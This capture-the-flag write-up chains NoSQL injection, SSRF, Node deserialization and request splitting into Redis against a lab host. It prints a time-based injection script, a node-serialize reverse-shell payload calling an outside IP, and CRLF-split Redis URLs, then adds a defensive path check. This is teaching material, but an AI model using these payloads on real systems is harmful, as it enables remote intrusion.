GrandTravel
0x01 Key points
NoSQL injection + SSRF + Node deserialization + Node request splitting + FTP privilege escalation
0x02 Solution
1 NoSQL injection to get the password
From the source code it is not hard to see that the login endpoint looks injectable (thanks to 葫芦卜 for the payload).
Reference:
https://blog.szfszf.top/article/9/
```python
burp0_data = {"username": f"admin\"&&this[\"pass\"+\"word\"][{pos}]>\"{chr(mid)}\"&&sleep(1100)||this[\"user\"+\"name\"]==\"admin", "password": "admin", "login": "login"}
# requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)
```
The exploit for the injection (time-based, one character per position):
```python
import requests, time

url = "http://192.168.76.128:3000/login"
username = ""  # accumulates the recovered password, one character per position
for pos in range(0, 100):
    for mid in range(35, 128):
        ti = time.time()
        # password[pos] < chr(mid) makes the query sleep 1100 ms; the first mid that
        # triggers the delay means password[pos] == chr(mid - 1)
        burp0_data = {"username": f"admin\"&&this[\"pass\"+\"word\"][{pos}]<\"{chr(mid)}\"&&sleep(1100)||this[\"user\"+\"name\"]==\"admin", "password": "admin", "login": "login"}
        requests.post(url, data=burp0_data)
        tim = time.time()
        # burp0_data = {"username": f"admin\"&&this[\"pass\"+\"word\"][{pos}]>\"{chr(mid)}\"&&sleep(1100)||this[\"user\"+\"name\"]==\"admin", "password": "admin", "login": "login"}
        if tim - ti > 1:
            print(burp0_data["username"])
            username += chr(mid - 1)
            print(username)
            break
# ip 192.168.76.1
```
2 SSRF to write deserialization data into Redis
IP: 192.168.76.1
So the key in Redis is:
admin492a66848a0b6c73cff8f5b4ace752f9
First visit the signup endpoint to create a cache entry in Redis.
Then we use gopher to generate the deserialization data.
3 Node deserialization RCE
https://threezh1.com/2020/01/30/NodeJsVulns/#node-serialize%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96RCE%E6%BC%8F%E6%B4%9E-CVE-2017-5941
```javascript
const serialize = require('node-serialize');
var test = {
    rce: function () { require('child_process').exec('bash -i >& /dev/tcp/ip/8080 0>&1', function (error, stdout, stderr) { console.log(stdout) }) },
}
console.log("Serialized payload: \n" + Buffer.from(serialize.serialize(test)).toString('base64'));
```
This generates the payload we need. But node-serialize only evals the function string when unserializing; to have the function actually invoked at that moment we append () so it becomes an immediately-invoked function expression:
```json
{"rce":"_$$ND_FUNC$$_function(){require('child_process').exec('bash -i >& /dev/tcp/ip/8080 0>&1',function(error, stdout, stderr){console.log(stdout)});}()"}
```
Then generate the Redis (RESP) payload. Each `$n` bulk-string length must equal the byte length of the string that follows it, otherwise Redis rejects the command with a protocol error and closes the connection:
```
*2
$4
AUTH
$31
Red1S_P0ssw0rd_a456wd4654aw54wd
*1
$7
COMMAND
*3
$3
set
$36
admin492a66848a0b6c73cff8f5b4ace752f9
$224
payload
```
http://0:6379/%C4%8DHTTP/1.1%C4%8D%C4%8A*2%C4%8D%C4%8A$4%C4%8D%C4%8AAUTH%C4%8D%C4%8A$31%C4%8D%C4%8ARed1S_P0ssw0rd_a456wd4654aw54wd%C4%8D%C4%8A*1%C4%8D%C4%8A$7%C4%8D%C4%8ACOMMAND%C4%8D%C4%8A*3%C4%8D%C4%8A$3%C4%8D%C4%8Aset%C4%8D%C4%8A$36%C4%8D%C4%8Admin492a66848a0b6c73cff8f5b4ace752f9%C4%8D%C4%8A$224%C4%8D%C4%8AeyJyY2UiOiJfJCRORF9GVU5DJCRfZnVuY3Rpb24oKXtyZXF1aXJlKCdjaGlsZF9wcm9jZXNzJykuZXhlYygnYmFzaCAtaSA+JiAvZGV2L3RjcC84LjE0Mi45My4xMDMvODA4MCAwPiYxJyxmdW5jdGlvbihlcnJvciwgc3Rkb3V0LCBzdGRlcnIpe2NvbnNvbGUubG9nKHN0ZG91dCl9KSgpO30ifQ==%C4%8D%C4%8A
Note that when the parameter is passed, URL decoding turns + into a space, so the + inside the base64 must itself be URL-encoded (%2b):
http://0:6379/%C4%8DHTTP/1.1%C4%8D%C4%8A*2%C4%8D%C4%8A$4%C4%8D%C4%8AAUTH%C4%8D%C4%8A$31%C4%8D%C4%8ARed1S_P0ssw0rd_a456wd4654aw54wd%C4%8D%C4%8A*1%C4%8D%C4%8A$7%C4%8D%C4%8ACOMMAND%C4%8D%C4%8A*3%C4%8D%C4%8A$3%C4%8D%C4%8Aset%C4%8D%C4%8A$36%C4%8D%C4%8Admin492a66848a0b6c73cff8f5b4ace752f9%C4%8D%C4%8A$224%C4%8D%C4%8AeyJyY2UiOiJfJCRORF9GVU5DJCRfZnVuY3Rpb24oKXtyZXF1aXJlKCdjaGlsZF9wcm9jZXNzJykuZXhlYygnYmFzaCAtaSA%2bJiAvZGV2L3RjcC84LjE0Mi45My4xMDMvODA4MCAwPiYxJyxmdW5jdGlvbihlcnJvciwgc3Rkb3V0LCBzdGRlcnIpe2NvbnNvbGUubG9nKHN0ZG91dCl9KSgpO30ifQ==%C4%8D%C4%8A
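As an added example (not code from the original writeup), the following JavaScript shows why the %C4%8D / %C4%8A sequences in the payload above turned into CR / LF inside the outgoing request on affected Node versions, and a guard that refuses such paths before http.request() is called. The function names are mine, and it assumes the application decoded the user-supplied path with decodeURIComponent.

```javascript
// Added example, not from the original writeup. Affected Node http clients wrote the
// request line with the 'latin1' encoding, which keeps only the low byte of each UTF-16
// code unit: U+010D ("%C4%8D") becomes 0x0D (CR) and U+010A ("%C4%8A") becomes 0x0A (LF).
function latin1Bytes(str) {
  return Buffer.from(str, 'latin1');
}

// Bytes that would reach the socket for a GET of the given percent-encoded path.
// Assumption (ours): the app decoded the user-supplied path with decodeURIComponent.
function wireRequestLine(rawPath) {
  const decoded = decodeURIComponent(rawPath);
  return latin1Bytes(`GET ${decoded} HTTP/1.1\r\n`);
}

// Number of CRLF pairs smuggled into the request line beyond the legitimate terminator;
// each one starts a new line that the receiving service (here Redis) parses on its own.
function injectedLineBreaks(rawPath) {
  const text = wireRequestLine(rawPath).toString('latin1');
  return text.split('\r\n').length - 2; // one legitimate CRLF, one trailing empty piece
}

// Hardened check to run before http.request(): accept only printable ASCII with no
// whitespace, so no character can be truncated into CR, LF or another control byte.
function isSafePath(rawPath) {
  let decoded;
  try {
    decoded = decodeURIComponent(rawPath);
  } catch (e) {
    return false; // malformed percent-encoding is refused as well
  }
  return /^[\x21-\x7e]*$/.test(decoded);
}

// Constructed sample: the first few RESP lines of the payload shown in the writeup.
const SAMPLE_SPLIT_PATH = '/%C4%8DHTTP/1.1%C4%8D%C4%8A*2%C4%8D%C4%8A$4%C4%8D%C4%8AAUTH%C4%8D%C4%8A';

console.log(JSON.stringify(wireRequestLine(SAMPLE_SPLIT_PATH).toString('latin1')));
console.log('injected line breaks:', injectedLineBreaks(SAMPLE_SPLIT_PATH));
console.log('safe to forward:', isSafePath(SAMPLE_SPLIT_PATH));
```

The same check rejects any other character above U+00FF whose low byte is a control character, not just the two used in this payload.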
4 FTP privilege escalation
We can see FTP, but when connecting to the service on our VPS we found that file uploads did not succeed: in passive mode the server returned an internal IP, which broke the transfer. So we use Node to start our own FTP server, then download the prepared files.
Then we got it.